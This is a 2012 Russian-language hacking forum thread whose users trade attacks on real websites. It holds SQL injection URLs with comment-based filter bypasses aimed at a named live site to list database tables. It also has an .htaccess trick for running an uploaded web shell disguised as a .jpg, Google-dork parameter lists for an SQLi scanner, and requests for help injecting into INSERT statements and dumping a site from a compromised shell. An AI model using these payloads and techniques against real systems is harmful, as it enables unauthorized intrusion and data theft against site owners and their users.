20.04.2012, 17:29
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
Провел на форуме:
45774
Репутация:
26
|
|
http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+from+information_schema.`tables`+--+
как тут обойти фильтрацию юниона?
З.Ы. разобрался, короче это из-за разных кодировок..
convert(table_name+using+нужная кодировка)
ток в моем случаи хз как узнать нужную...
|
|
|
20.04.2012, 17:52
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от smirk
http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+from+information_schema.`tables`+--+
как тут обойти фильтрацию юниона?
З.Ы. разобрался, короче это из-за разных кодировок..
convert(table_name+using+нужная кодировка)
ток в моем случаи хз как узнать нужную...
Там union не фильтруется. нет правна просмотр schema.tables.
http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,unhex(hex(table_name)),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17+from+information_schema.columns+wher e+column_name+like+0x25696425--+
|
|
|
|
20.04.2012, 19:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
такой вопрос, заливаю в админке через загрузчик изображений шелл, заливается нормально, только при открытии его
http://сайт.ру/userfiles/image/222_20110623183746.php
открывается его исходный код, что можно тут пидумать? поможел ли заливка .htaccess?
если да то с каким содержимым?
|
|
|
|
20.04.2012, 19:37
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
попробуй с таким содержимым
Код:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
|
|
|
|
21.04.2012, 08:25
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
пишу сканер SQLi
подскажите наиболее часто встречающиеся параметры на страницах
мой список:
Код:
id
page
num
name
p
n
нужно найти еще парочку популярных |
|
|
|
21.04.2012, 10:35
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от \/ITA
пишу сканер SQLi
подскажите наиболее часто встречающиеся параметры на страницах
мой список:
Код:
id
page
num
name
p
n
нужно найти еще парочку популярных Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c - 31 900 000
cat - 21 300 000
category - 7 560 000
CatID - 4 850 000
pagina - 3 660 000
PID - 2 180 000
sn - 116 000
catalogid - 12 600
|
|
|
|
21.04.2012, 11:05
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от mix0x0
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c
- 31 900 000
cat
- 21 300 000
category
- 7 560 000
CatID
- 4 850 000
pagina
- 3 660 000
PID
- 2 180 000
sn
- 116 000
catalogid
- 12 600
спасибо за подсказку
нашел скулю в POST на одном сайте подставил site.ru?id=1"
выдает мне такое:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1""' at line 3 SQL query :
INSERT INTO
ips(ip, cnt, last_url)
VALUES("***.93.28.***", 1,"/?id=1"")
ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1""
я еще не пробовал инжектить в Insert или Update
где можно почитать посмотреть как это делается?
|
|
|
|
21.04.2012, 11:27
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Сообщение от mix0x0
Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.
...результаты по запросу (inurl:"php?параметр=1"):
c
- 31 900 000
cat
- 21 300 000
category
- 7 560 000
CatID
- 4 850 000
pagina
- 3 660 000
PID
- 2 180 000
sn
- 116 000
catalogid
- 12 600
Сканеры - гавно, лучше руками искать.
|
|
|
|
21.04.2012, 12:15
|
|
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049
Репутация:
0
|
|
Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?
хееелп ми
|
|
|
|
21.04.2012, 12:45
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от \/ITA
спасибо за подсказку
нашел скулю в POST на одном сайте подставил
site.ru?id=1"
выдает мне такое:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1""' at line 3 SQL query :
INSERT INTO
ips(ip, cnt, last_url)
VALUES("***.93.28.***", 1,"/?id=1"")
ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1""
я еще не пробовал инжектить в Insert или Update
где можно почитать посмотреть как это делается?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
